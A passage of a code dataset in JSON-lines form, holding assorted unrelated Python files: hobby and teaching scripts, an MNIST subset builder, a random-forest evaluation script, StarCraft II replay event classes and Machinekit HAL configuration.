bg=\"black\", fg=\"white\", width=\"300\", height=\"2\", font=(\"Calibri\", 13)).pack()\nLabel(root, text=\"Hostname:\", font=(\"Arial Bold\", 13)).place(x=16, y=60)\naa = StringVar()\nb = Entry(root, textvariable=aa, font=(\"Arial\", 13), state=\"disabled\")\naa.set(host)\nb.place(x=120, y=60)\nLabel(root, text=\"IP Address:\", font=(\"Arial Bold\", 13)).place(x=10, y=100)\naaa = StringVar()\nbb = Entry(root, textvariable=aaa, font=(\"Arial\", 13), state=\"disabled\")\naaa.set(socket.gethostbyname(host))\nbb.place(x=120, y=100)\nstart_button = Button(root, text=\"Start Server\", width=12, height=1, bg=\"black\", fg=\"white\", command=startserver)\nstart_button.place(x=120, y=140)\nroot.mainloop()\n","sub_path":"LaN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227165355","text":"# creating the set of ones and sevens\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mymnist as mm\n\n# set paths\ndata_path = '../data/'\npath_train_imgs = data_path + 'train-images.idx3-ubyte'\npath_train_lbls = data_path + 'train-labels.idx1-ubyte'\n\n# use parser to get the 3D array of images and the 1D vector of labels\nimages, labels = mm.MNIST_parser(path_train_imgs, path_train_lbls)\n\n# sanity check\nprint(images.shape)\nprint(labels[38])\nmm.digit_painter(images[38])\n\n# fix quantities of 1s and 7s to retain\n# allows for later flexibility\nn1 = 1000\nn7 = 5000\n\n# select n1 ones\nlabels_1 = np.full((n1,), 1) # these are just ones..\nimages_1 = images[labels == 1][:n1] # !No error if n1 > n1_total\n\n# select n7 sevens\nlabels_7 = np.full((n7,), 7)\nimages_7 = images[labels == 7][:n7]\n\n# concatenating:\nlabels_17 = np.concatenate((labels_1, labels_7))\nimages_17 = np.concatenate((images_1, images_7))\nprint(labels_17.shape)\nprint(images_17.shape)\n\n# shuffle things around\nshuffle = np.random.permutation(n1 + n7)\nlabels_17 = labels_17[shuffle]\nimages_17 = images_17[shuffle]\n\n# sanity 
check\nprint(labels_17[:10])\nmm.digit_painter(images_17[:10])\n\n# save if needed\n#np.save(\"../data/images_1_7.npy\", images_17)\n#np.save(\"../data/labels_1_7.npy\", labels_17)","sub_path":"sample/create_set_1_7.py","file_name":"create_set_1_7.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"344888729","text":"import turtle\n\ndef drunk_pirate(mov):\n wn = turtle.Screen()\n wn.bgcolor('lightgreen')\n t = turtle.Turtle()\n t.shape('turtle')\n t.color('blue')\n\n for (angle, move) in mov:\n t.left(angle)\n t.forward(move)\n\n\n wn.mainloop()\n\nmoves = [(160, 200), (-43, 100), (270, 80), (-43, 120)]\ndrunk_pirate(moves)","sub_path":"ex_7_26_11.py","file_name":"ex_7_26_11.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"232226780","text":"########################################################\n#------------------------------------------------------#\n#\n# Machine Perception and Cognitive Robotics Laboratory\n#\n# Center for Complex Systems and Brain Sciences\n# Florida Atlantic University\n#\n#------------------------------------------------------#\n########################################################\n#------------------------------------------------------#\n#LabManual\n\n\n#timer\n\nfrom rover import Rover20\nimport time\n\n\ndef main(): # defining the function called \"main()\"\n rover = Rover20() # redefine the module Rover20 so we can use \"rover\" instead. It makes things easier.\n\n rover.turnLightsOn() # turn on green lights\n time.sleep(1) # make the rover wait 1 second in its current state\n\n rover.turnLightsOff() # turn off green lights. 
Duh!\n    time.sleep(1)         # make the rover wait 1 second in its current state\n\n    rover.close()         # close rover\n\n\nmain() # run the function we have just defined\n","sub_path":"Intro/3_LightsOn/LightsOn.py","file_name":"LightsOn.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"118111482","text":"import datetime\n\ncur = datetime.datetime.now()\nprint(cur)\ndef month_day(year, month):\n    if month == 2:\n        if (year%4 == 0) and (year%100 != 0) or (year%400) == 0:\n            return days[1]\n        else:\n            return days[0]\n    elif month <= 7:\n        # January-July: odd months have 31 days, the others 30\n        if month % 2 == 1:\n            return days[3]\n        else:\n            return days[2]\n    else:\n        # August-December: the parity flips, so even months have 31 days\n        if month % 2 == 0:\n            return days[3]\n        else:\n            return days[2]\ndays = [28,29,30,31]\n\nprint(month_day(cur.year,cur.month),'days for', cur.year, '-', cur.month)\n","sub_path":"2020/0317.py","file_name":"0317.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"387892690","text":"\n# coding: utf-8\n\n# In[19]:\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import KFold\nfrom sklearn.datasets import load_boston\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score, auc\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.multiclass import OneVsRestClassifier\nprint(\"Packages Loaded\", flush = True)\n#%%\nimport h2o\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.grid.grid_search import H2OGridSearch\n\nh2o.init()\n\n# In[3]:\n\n#For merging all files\nimport numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/bduser/BigDataLabProjects/ICS/QCRI')\n#%%\nd1 = pd.read_csv('data_matrix50k.csv')\nd1.drop(d1.columns[[0]], axis=1, inplace=True)\n#Read data matrix\nprint(\"First CSV Loaded\",flush = True)\n#%%\n#d2 = pd.read_csv('data_matrix100k.csv')\n#d2.drop(d2.columns[[0]], axis=1, inplace=True)\n#print(\"Second CSV Loaded\",flush = True)\n##%%\n#d3 = pd.read_csv('data_matrix150k.csv')\n#d3.drop(d3.columns[[0]], axis=1, inplace=True)\n#print(\"Third CSV Loaded\",flush = True)\n##%%\n#d4 = pd.read_csv('data_matrix182k.csv')\n#d4.drop(d4.columns[[0]], axis=1, inplace=True)\n#print(\"Fourth CSV Loaded\",flush = True)\n##%%\n#frames = [d1, d2, d3, d4]\n#x = pd.concat(frames)\n#print(\"Data matrix generated\",flush = True)\n#print(x.shape,flush = True)\n##%%\n#print(\"Loading Class Labels\",flush = True)\n#c = pd.read_csv(\"Class.csv\")\n#print(c.shape, flush = True)\n#%%\n#Class = pd.read_csv(\"class5k.csv\")\n#Class.drop(Class.columns[[0]], axis=1, inplace=True)\n#x = d1.head(5000)\n#c = Class\n#%%\n#df_matrix = df.values\n\n\n#data_matrix = np.append(df_matrix, c, axis=1) #appends the data matrix and labels \n\n#x1 = pd.DataFrame(data_matrix)\n#x1.to_csv('QCRIFulldata.csv')\n\n#one = x1.loc[x1[18191] == 1] #Seggregate the data\n#two = x1.loc[x1[18191] == 2]\n#three = x1.loc[x1[18191] == 3]\n#four = x1.loc[x1[18191] == 4]\n#x = one.append([two, three, four])\n#print(x.shape, flush = True)\n\n\n#x = 
pd.DataFrame(data_matrix) \n#print(\"Starting Cross Fold\", flush = True)\n \nx = d1.head(5000)\nx = x[x.columns[0:100]]\nc = [1] * 1250 + [2] * 1250 + [3] * 1250 + [4] * 1250\nc = pd.DataFrame(c)\n\n\n#print(x['18191'], flash = True)\n#print(type(x['18191'][0]), flash = True)\n#print(type(x['18191']), flash = True)\n#x['18191'] = x['18191'].astype('category')\n\n#from sklearn import preprocessing \n#encoder = preprocessing.LabelEncoder()\n#c = encoder.fit_transform(c)\n\n\n#%%\nn_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]\nbootstrap = [True, False]\nmax_features = ['auto', 'sqrt']\n\nrandom_grid = {'n_estimators': n_estimators,'max_features': max_features, 'bootstrap':bootstrap}\nrf = RandomForestClassifier()\nsearch_model = RandomizedSearchCV(estimator = rf, \n param_distributions = random_grid, \n cv = 5, \n n_jobs = -1,\n verbose=5)\nprint(\"Parameter Tuning\")\nsearch_model.fit(x,c.values.ravel())\n\n#%%\nbest_params = search_model.best_params_\nprint(\"Best Parameters Values: \",best_params,flush=True)\nprint(\"Best Score: \",search_model.best_score_,flush=True)\n#%%\nXX = x\nYY = c\n\nn_splits = 5\nkf = KFold(n_splits=n_splits, shuffle=True)\n\ncon = []\nacc = []\nre = []\npr = []\nf1 = []\nauc_val = []\nd = {1,2,3}\nprint(\"Cross-Fold Validation\",flush = True)\nfor e in d:\n print(\"Round: \", e, flush = True)\n for train_index, val_index in kf.split(XX):\n print(train_index)\n print(val_index)\n auc1 = []\n\n print('Modelling', flush = True)\n model = RandomForestClassifier(**best_params)\n #model = RandomizedSearchCV(estimator = rf, param_distributions = random_grid, cv = 2, n_jobs = -1)\n\n model.fit(XX.iloc[train_index], YY.iloc[train_index].values.ravel())\n #best_random = model.best_estimator_\n print('Predicting', flush = True)\n\n pred = model.predict(XX.iloc[val_index])\n pred_prb = model.predict_proba(XX.iloc[val_index])\n print('Metrics', flush = True)\n for i in [1,2,3,4]:\n fpr, tpr, thresholds = metrics.roc_curve(YY.iloc[val_index], np.max(pred_prb, axis=1), pos_label= i)\n auc1.append(auc(fpr, tpr))\n \n \n matrix = confusion_matrix(YY.iloc[val_index], pred)\n\n acc1 = matrix.diagonal()/matrix.sum(axis=1)\n re1 = recall_score(YY.iloc[val_index], pred, average=None)\n pr1 = precision_score(YY.iloc[val_index], pred, average=None)\n f11 = f1_score(YY.iloc[val_index], pred, average=None)\n \n\n\n acc.append(acc1)\n re.append(re1)\n pr.append(pr1)\n f1.append(f11)\n con.append(matrix)\n auc_val.append(auc1)\n\n\n# In[37]:\n\nAccuracy = pd.DataFrame(acc, columns =['1', '2', '3', '4'])\n\nPrecision = pd.DataFrame(pr, columns =['1', '2', '3', '4'])\n\nRecall = pd.DataFrame(re, columns =['1', '2', '3', '4'])\n\nF1score = pd.DataFrame(f1, columns =['1', '2', '3', '4'])\n\nAUC = pd.DataFrame(auc_val, columns =['1', '2', '3', '4'])\ntin = []\nfin =list(Accuracy.mean())\nfin.append('Accuracy')\nfin\ngin = list(Precision.mean())\ngin.append('Precision')\ngin\ndin = list(Recall.mean())\ndin.append('Recall')\ndin\njam= list(F1score.mean())\njam.append('F1score')\njam\naam = list(AUC.mean())\naam.append('AUC')\naam\ntin.append(fin)\ntin.append(gin)\ntin.append(din)\ntin.append(jam)\ntin.append(aam)\ntin\nprint(tin, flush=True)\nResults_Randomforest = pd.DataFrame(tin,columns =['1', '2', '3', '4', 'Metrics']) 
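# gather the averaged per-class metrics into a single results table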
\nResults_Randomforest.to_csv('RandomForestoutput.csv')\n\n","sub_path":"QCRI_Modelling_RandomForest_h2o.py","file_name":"QCRI_Modelling_RandomForest_h2o.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25070789","text":"# implemented with a for statement\ndef stars(rows):\n    for row in range(1, rows + 1):\n        for space in range(0, rows - row):\n            print(\" \", end=\"\")\n        for can in range(0, row * 2 - 1):\n            print(\"*\", end=\"\")\n        print(\"\")\n\nstars(8)\n\n\n# implemented with a while statement\n# def yanghui(j):\n#     i=1\n#     j=10\n#     while i<=j:\n#         print(\" \"*(j-i),\"*\"*(2*i-1))\n#         i+=1\n#\n# yanghui(8)","sub_path":"函数杨辉三角.py","file_name":"函数杨辉三角.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"68624837","text":"#!/usr/bin/python\n\n'''\n\nCopyright (c) 2014 Schmichael Chen\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nAuthor: Schmichael Chen \n\n'''\n\n# References\n# ++++++++++\n\n# 1) http://www.ibm.com/developerworks/library/os-python8/\n\n# 2) http://stackoverflow.com/questions/12330522/reading-a-file-without-newlines\n\n# 3) http://stackoverflow.com/questions/82831/how-do-i-check-if-a-file-exists-using-python\n\n# 4) http://stackoverflow.com/questions/9381463/how-to-create-a-file-in-linux-from-terminal-window\n\n# 5) http://stackoverflow.com/questions/17115664/can-linux-cat-command-be-used-for-writing-text-to-file\n\nimport os \n\nimport os.path\n\nfrom sys import stdout\n\nimport global_variables\n\nfrom __print__ import __print__ \n\ndef best_score():\n\n\tif os.path.isfile(\"score_file.txt\") == False:\n\n\t\tos.system(\"echo 0 > score_file.txt\")\t\n\n\t\tstdout.write(\"\\nBest Score: \")\n\n\t\t__print__(0)\n\n\telse:\n\n\t\tscore_from_score_file = open(\"score_file.txt\",'r').read().split('\\n')\n\n\t\tstdout.write(\"\\nBest Score: \")\n\n\t\tif int(score_from_score_file[0]) > global_variables.score:\n\n\t\t\t__print__(score_from_score_file[0])\n\n\t\telse:\n\n\t\t\t__print__(global_variables.score)\n","sub_path":"best_score.py","file_name":"best_score.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551892623","text":"# Patrick Kunst\n# Lab 7\n# CSC 242\n\ndef printPattern(a, b=0):#FIX LATER\n    if a==1:\n        print(' '*b + '*')\n    else:\n        printPattern(a//2, b)\n        print(' '*b + '*'*a)\n        printPattern(a//2, b+a//2)\n\n    \n\ndef gcd(m, n):\n    if m==0:\n        return n\n\n    elif n==0:\n        
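# base case: gcd(m, 0) is m\n        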
return m\n\n elif m>n:\n return(gcd(n, m-n))\n\n else:\n return(gcd(m, n-m))\n\ndef f(x):\n if x==0:\n return 0\n\n elif x==1:\n return 1\n\n else:\n return (f(x-1) + f(x-2))/2\n\nif __name__=='__main__':\n import doctest\n doctest.testfile('lab7TEST.py')\n","sub_path":"lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46176554","text":"from __future__ import absolute_import\n\nfrom sc2reader.utils import Length, LITTLE_ENDIAN\nfrom sc2reader.data import Unit\nfrom sc2reader.log_utils import loggable\n\n@loggable\nclass Event(object):\n name = 'Event'\n\n def __init__(self, frame, pid):\n self.pid = pid\n self.frame = frame\n self.second = frame >> 4\n self.time = Length(seconds=self.second)\n\n def load_context(self, replay):\n if self.pid != 16:\n self.player = replay.person[self.pid]\n\n def _str_prefix(self):\n player_name = self.player.name if getattr(self,'pid', 16)!=16 else \"Global\"\n return \"%s\\t%-15s \" % (Length(seconds=int(self.frame/16)), player_name)\n\n def __str__(self):\n return self._str_prefix() + self.name\n\n@loggable\nclass GameEvent(Event):\n name = 'GameEvent'\n\n \"\"\"Abstract Event Type, should not be directly instanciated\"\"\"\n def __init__(self, frame, pid, event_type):\n super(GameEvent, self).__init__(frame, pid)\n\n self.type = event_type\n self.is_local = (pid != 16)\n event_class = event_type >> 4\n self.is_init = (event_class == 0)\n self.is_player_action = (event_class == 1)\n self.is_camera_movement = (event_class == 3)\n\n#############################################3\n# Message Events\n#########################\n\n@loggable\nclass MessageEvent(Event):\n name = 'MessageEvent'\n\n def __init__(self, frame, pid, flags):\n super(MessageEvent, self).__init__(frame, pid)\n self.flags=flags\n\n@loggable\nclass ChatEvent(MessageEvent):\n name = 'ChatEvent'\n\n def __init__(self, frame, pid, flags, target, text):\n super(ChatEvent, self).__init__(frame, pid, flags)\n self.target = target\n self.text = text\n self.to_all = (self.target == 0)\n self.to_allies = (self.target == 2)\n self.to_observers = (self.target == 4)\n\n@loggable\nclass PacketEvent(MessageEvent):\n name = 'PacketEvent'\n\n def __init__(self, frame, pid, flags, info):\n super(PacketEvent, self).__init__(frame, pid, flags)\n self.info = info\n\n@loggable\nclass PingEvent(MessageEvent):\n name = 'PingEvent'\n\n def __init__(self, frame, pid, flags, x, y):\n super(PingEvent, self).__init__(frame, pid, flags)\n self.x, self.y = x, y\n\n\n#############################################3\n# Game Events\n#########################\n\nclass UnknownEvent(GameEvent):\n name = 'UnknownEvent'\n\nclass PlayerJoinEvent(GameEvent):\n name = 'PlayerJoinEvent'\n\n def __init__(self, frames, pid, event_type, flags):\n super(PlayerJoinEvent, self).__init__(frames, pid, event_type)\n self.flags = flags\n\nclass GameStartEvent(GameEvent):\n name = 'GameStartEvent'\n\nclass PlayerLeaveEvent(GameEvent):\n name = 'PlayerLeaveEvent'\n\nclass CameraEvent(GameEvent):\n name = 'CameraEvent'\n\n def __init__(self, frames, pid, event_type, x, y, distance, pitch, yaw, height_offset):\n super(CameraEvent, self).__init__(frames, pid, event_type)\n self.x, self.y = x, y\n self.distance = distance\n self.pitch = pitch\n self.yaw = yaw\n self.height_offset = height_offset\n\n def __str__(self):\n return self._str_prefix() + \"{0} at ({1}, {2})\".format(self.name, self.x,self.y)\n\nclass 
PlayerActionEvent(GameEvent):\n    name = 'PlayerActionEvent'\n\n@loggable\nclass SendResourceEvent(PlayerActionEvent):\n    name = 'SendResourceEvent'\n\n    def __init__(self, frames, pid, event_type, target, minerals, vespene, terrazine, custom):\n        super(SendResourceEvent, self).__init__(frames, pid, event_type)\n        self.sender = pid\n        self.reciever = target\n        self.minerals = minerals\n        self.vespene = vespene\n        self.terrazine = terrazine\n        self.custom = custom\n\n    def __str__(self):\n        return self._str_prefix() + \" transfer {0} minerals, {1} gas, {2} terrazine, and {3} custom to {4}\".format(self.minerals, self.vespene, self.terrazine, self.custom, self.reciever)\n\n    def load_context(self, replay):\n        super(SendResourceEvent, self).load_context(replay)\n        self.sender = replay.player[self.sender]\n        self.reciever = replay.player[self.reciever]\n\n@loggable\nclass RequestResourceEvent(PlayerActionEvent):\n    name = 'RequestResourceEvent'\n\n    def __init__(self, frames, pid, event_type, minerals, vespene, terrazine, custom):\n        super(RequestResourceEvent, self).__init__(frames, pid, event_type)\n        self.minerals = minerals\n        self.vespene = vespene\n        self.terrazine = terrazine\n        self.custom = custom\n\n    def __str__(self):\n        return self._str_prefix() + \" requests {0} minerals, {1} gas, {2} terrazine, and {3} custom\".format(self.minerals, self.vespene, self.terrazine, self.custom)\n\n@loggable\nclass AbilityEvent(PlayerActionEvent):\n    name = 'AbilityEvent'\n\n    def __init__(self, frame, pid, event_type, ability, flags):\n        super(AbilityEvent, self).__init__(frame, pid, event_type)\n        self.ability_code = ability\n        self.ability_name = 'Unknown'\n        self.flags = flags\n\n    def load_context(self, replay):\n        super(AbilityEvent, self).load_context(replay)\n        if not replay.datapack:\n            return\n\n        if self.ability_code not in replay.datapack.abilities:\n            if not getattr(replay, 'marked_error', None):\n                replay.marked_error=True\n                self.logger.error(replay.filename)\n                self.logger.error(\"Release String: \"+replay.release_string)\n                for player in replay.players:\n                    self.logger.error(\"\\t\"+str(player))\n\n            self.logger.error(\"{0}\\t{1}\\tMissing ability {2} from {3}\".format(self.frame, self.player.name, hex(self.ability_code), replay.datapack.__class__.__name__))\n\n        else:\n            self.ability = replay.datapack.abilities[self.ability_code]\n            self.ability_name = self.ability.name\n\n\n    def __str__(self):\n        return self._str_prefix() + \"Ability (%s) - %s\" % (hex(self.ability_code), self.ability_name)\n\n@loggable\nclass TargetAbilityEvent(AbilityEvent):\n    name = 'TargetAbilityEvent'\n\n    def __init__(self, frame, pid, event_type, ability, flags, target, player, team, location):\n        super(TargetAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n        self.target = None\n        self.target_id, self.target_type = target\n\n        self.target_owner = None\n        self.target_owner_id = player\n        self.target_team = None\n        self.target_team_id = team\n        self.location = location\n\n        # We can't know if it is a hallucination or not so assume not\n        self.target_type = self.target_type << 8 | 0x01\n\n\n    def load_context(self, replay):\n        super(TargetAbilityEvent, self).load_context(replay)\n\n        \"\"\" Disabled since this seems to have gone out of bounds\n        sc2reader/ggtracker/204927.SC2Replay\n        if self.target_owner_id:\n            print replay.people\n            print self.target_owner_id\n            self.target_owner = replay.player[self.target_owner_id]\n        \"\"\"\n\n        \"\"\" Disabled since team seems to always be the same player\n        if self.target_team_id:\n            self.target_team = 
replay.team[self.target_team_id]\n \"\"\"\n\n if not replay.datapack:\n return\n\n uid = (self.target_id, self.target_type)\n if uid in replay.objects:\n self.target = replay.objects[uid]\n\n else:\n if self.target_type not in replay.datapack.units:\n self.logger.error(\"{0}\\t{1}\\tMissing unit {2} from {3}\".format(self.frame, self.player.name, hex(self.target_type), replay.datapack.id))\n unit = Unit(self.target_id)\n\n else:\n unit_class = replay.datapack.units[self.target_type]\n unit = unit_class(self.target_id)\n\n self.target = unit\n replay.objects[uid] = unit\n\n def __str__(self):\n if self.target:\n if isinstance(self.target, Unit):\n target = \"{0} [{1:0>8X}]\".format(self.target.name, self.target.id)\n else:\n target = \"{0:X} [{1:0>8X}]\".format(self.target[1], self.target[0])\n else:\n target = \"NONE\"\n\n return AbilityEvent.__str__(self) + \"; Target: {0}\".format(target)\n\n@loggable\nclass LocationAbilityEvent(AbilityEvent):\n name = 'LocationAbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags, location):\n super(LocationAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n self.location = location\n\n def __str__(self):\n return AbilityEvent.__str__(self) + \"; Location: %s\" % str(self.location)\n\n@loggable\nclass SelfAbilityEvent(AbilityEvent):\n name = 'SelfAbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags, info):\n super(SelfAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n self.info = info\n\n@loggable\nclass HotkeyEvent(PlayerActionEvent):\n name = 'HotkeyEvent'\n\n def __init__(self, frame, pid, event_type, hotkey, deselect):\n super(HotkeyEvent, self).__init__(frame, pid, event_type)\n self.hotkey = hotkey\n self.deselect = deselect\n\nclass SetToHotkeyEvent(HotkeyEvent):\n name = 'SetToHotkeyEvent'\n\nclass AddToHotkeyEvent(HotkeyEvent):\n name = 'AddToHotkeyEvent'\n\nclass GetFromHotkeyEvent(HotkeyEvent):\n name = 'GetFromHotkeyEvent'\n\n@loggable\nclass SelectionEvent(PlayerActionEvent):\n name = 'SelectionEvent'\n\n def __init__(self, frame, pid, event_type, bank, objects, deselect):\n super(SelectionEvent, self).__init__(frame, pid, event_type)\n self.bank = bank\n self.raw_objects = objects\n self.deselect = deselect\n\n def load_context(self, replay):\n super(SelectionEvent, self).load_context(replay)\n\n if not replay.datapack:\n return\n\n objects = list()\n data = replay.datapack\n for (obj_id, obj_type) in self.raw_objects:\n if (obj_id, obj_type) in replay.objects:\n obj = replay.objects[(obj_id,obj_type)]\n else:\n if obj_type in data.units:\n obj = data.units[obj_type](obj_id)\n else:\n msg = \"Unit Type {0} not found in {1}\"\n self.logger.error(msg.format(hex(obj_type), data.__class__.__name__))\n obj = Unit(obj_id)\n\n replay.objects[(obj_id,obj_type)] = obj\n\n objects.append(obj)\n\n\n self.objects = objects\n","sub_path":"sc2reader/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"59470544","text":"from machinekit import hal\nfrom machinekit import rtapi as rt\nfrom machinekit import config as c\n\nimport rcomps\nimport storage\nimport motion\n\ndef assign_param(name,signal,val):\n import subprocess\n subprocess.call(\"halcmd setp %s.%s %s\"%(name,signal,str(val)), shell=True )\n\n\n\ndef usrcomp_status(compname, signame, thread, resetSignal='estop-reset'):\n sigIn = hal.newsig('%s-error-in' % signame, hal.HAL_BIT)\n sigOut 
= hal.newsig('%s-error' % signame, hal.HAL_BIT)\n sigOk = hal.newsig('%s-ok' % signame, hal.HAL_BIT)\n\n sigIn.link('%s.error' % compname)\n\n safetyLatch = rt.newinst('safety_latch', 'safety-latch.%s-error' % signame)\n hal.addf(safetyLatch.name, thread)\n safetyLatch.pin('error-in').link(sigIn)\n safetyLatch.pin('error-out').link(sigOut)\n safetyLatch.pin('reset').link(resetSignal)\n safetyLatch.pin('threshold').set(500) # 500ms error\n safetyLatch.pin('latching').set(True)\n\n notComp = rt.newinst('not', 'not.%s-no-error' % signame)\n hal.addf(notComp.name, thread)\n notComp.pin('in').link(sigOut)\n notComp.pin('out').link(sigOk)\n\n\ndef usrcomp_watchdog(comps, enableSignal, thread,\n okSignal=None, errorSignal=None):\n count = len(comps)\n watchdog = rt.loadrt('watchdog', num_inputs=count)\n hal.addf('watchdog.set-timeouts', thread)\n hal.addf('watchdog.process', thread)\n for n, comp in enumerate(comps):\n compname = comp[0]\n comptime = comp[1]\n sigIn = hal.newsig('%s-watchdog' % compname, hal.HAL_BIT)\n hal.Pin('%s.watchdog' % compname).link(sigIn)\n watchdog.pin('input-%i' % n).link(sigIn)\n watchdog.pin('timeout-%i' % n).set(comptime)\n watchdog.pin('enable-in').link(enableSignal)\n\n if not okSignal:\n okSignal = hal.newsig('watchdog-ok', hal.HAL_BIT)\n watchdog.pin('ok-out').link(okSignal)\n\n if errorSignal:\n notComp = rt.newinst('not', 'not.watchdog-error')\n hal.addf(notComp.name, thread)\n notComp.pin('in').link(okSignal)\n notComp.pin('out').link(errorSignal)\n\n\ndef setup_stepper(stepgenIndex, section, axisIndex=None,\n stepgenType='hpg.stepgen', gantry=False,\n gantryJoint=0, velocitySignal=None, thread=None):\n stepgen = '%s.%01i' % (stepgenType, stepgenIndex)\n if axisIndex is not None:\n axis = 'axis.%i' % axisIndex\n hasMotionAxis = (axisIndex is not None) and (not gantry or gantryJoint == 0)\n velocityControlled = velocitySignal is not None\n\n # axis enable chain\n enableIndex = axisIndex\n if axisIndex is None:\n enableIndex = 0 # use motor enable signal\n enable = hal.Signal('emcmot-%i-enable' % enableIndex, hal.HAL_BIT)\n if hasMotionAxis:\n enable.link('%s.amp-enable-out' % axis)\n enable.link('%s.enable' % stepgen)\n\n # expose timing parameters so we can multiplex them later\n sigBase = 'stepgen.%i' % stepgenIndex\n\n assign_param(sigBase,\"position-scale\",c.find(section, 'SCALE'))\n assign_param(sigBase,\"maxaccel\",c.find(section, 'STEPGEN_MAXACC'))\n #assign_param(sigBase,\"maxvel\",c.find(\"ABP\", 'STEPGEN_MAXVEL'))\n\n # position command and feedback\n limitHome = hal.newsig('limit-%i-home' % axisIndex, hal.HAL_BIT)\n limitMin = hal.newsig('limit-%i-min' % axisIndex, hal.HAL_BIT)\n limitMax = hal.newsig('limit-%i-max' % axisIndex, hal.HAL_BIT)\n limitHome.link('%s.home-sw-in' % axis)\n limitMin.link('%s.neg-lim-sw-in' % axis)\n limitMax.link('%s.pos-lim-sw-in' % axis)\n\n if velocityControlled:\n hal.net(velocitySignal, '%s.velocity-cmd' % stepgen)\n\ndef setup_stepper_multiplexer(stepgenIndex, sections, selSignal, thread):\n num = len(sections)\n sigBase = 'stepgen-%i' % stepgenIndex\n\n unsignedSignals = [['dirsetup', 'DIRSETUP'],\n ['dirhold', 'DIRHOLD'],\n ['steplen', 'STEPLEN'],\n ['stepspace', 'STEPSPACE']]\n\n floatSignals = [['scale', 'SCALE'],\n ['max-vel', 'STEPGEN_MAX_VEL'],\n ['max-acc', 'STEPGEN_MAX_ACC']]\n\n for item in unsignedSignals:\n signal = hal.Signal('%s-%s' % (sigBase, item[0]), hal.HAL_U32)\n mux = rt.newinst('muxn_u32', 'mux%i.%s' % (num, signal.name), pincount=num)\n hal.addf(mux.name, thread)\n for n, section in 
enumerate(sections):\n mux.pin('in%i' % n).set(c.find(section, item[1]))\n mux.pin('sel').link(selSignal)\n mux.pin('out').link(signal)\n\n for item in floatSignals:\n signal = hal.Signal('%s-%s' % (sigBase, item[0]), hal.HAL_FLOAT)\n mux = rt.newinst('muxn', 'mux%i.%s' % (num, signal.name), pincount=num)\n hal.addf(mux.name, thread)\n for n, section in enumerate(sections):\n mux.pin('in%i' % n).set(c.find(section, item[1]))\n mux.pin('sel').link(selSignal)\n mux.pin('out').link(signal)\n\n\ndef setup_probe(thread):\n probeEnable = hal.newsig('probe-enable', hal.HAL_BIT)\n probeInput = hal.newsig('probe-input', hal.HAL_BIT)\n probeSignal = hal.newsig('probe-signal', hal.HAL_BIT)\n\n and2 = rt.newinst('and2', 'and2.probe-input')\n hal.addf(and2.name, thread)\n and2.pin('in0').link(probeSignal)\n and2.pin('in1').link(probeEnable)\n and2.pin('out').link(probeInput)\n\n probeInput += 'motion.probe-input'\n\n motion.setup_probe_io()\n\ndef setup_tclab():\n #import hal_tclab\n # from hal_tclab import prepare\n # prepare()\n 